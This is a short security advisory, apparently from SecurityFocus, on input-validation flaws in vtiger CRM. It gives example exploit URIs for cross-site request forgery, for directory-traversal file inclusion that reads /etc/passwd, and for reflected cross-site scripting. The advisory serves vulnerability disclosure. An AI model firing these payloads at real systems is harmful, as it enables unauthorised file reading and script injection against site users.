vtiger CRM Multiple Input Validation Vulnerabilities

An attacker can use a browser to exploit these issues. To exploit the cross-site scripting and cross-site request-forgery vulnerabilities, the attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

For the cross-site request-forgery issue:
http://www.example.com/vtigercrm/index.php?module=Rss&action=Save&rssurl=http://www.example2.com

For the local file-include issues:
http://www.example.com/vtigercrm/graph.php?module=/../[..]/../etc/passwd%00
http://www.example.com/vtigercrm/index.php?module=Accounts&action=Import&parenttab=Support&step=/../[..]/../etc/passwd%00
http://www.example.com/vtigercrm/include/Ajax/CommonAjax.php?module=Email&file=bar
http://www.example.com/vtigercrm/include/Ajax/CommonAjax.php?module=Email&file=bar

For the cross-site scripting issue:
http://www.example.com/vtigercrm/phprint.php?module=Activities&action=--%3E%3Cscript%3Ealert(%22example%22);%3C/script%3E%3C!--

The following exploit is available:


 

Privacy Statement
Copyright 2010, SecurityFocus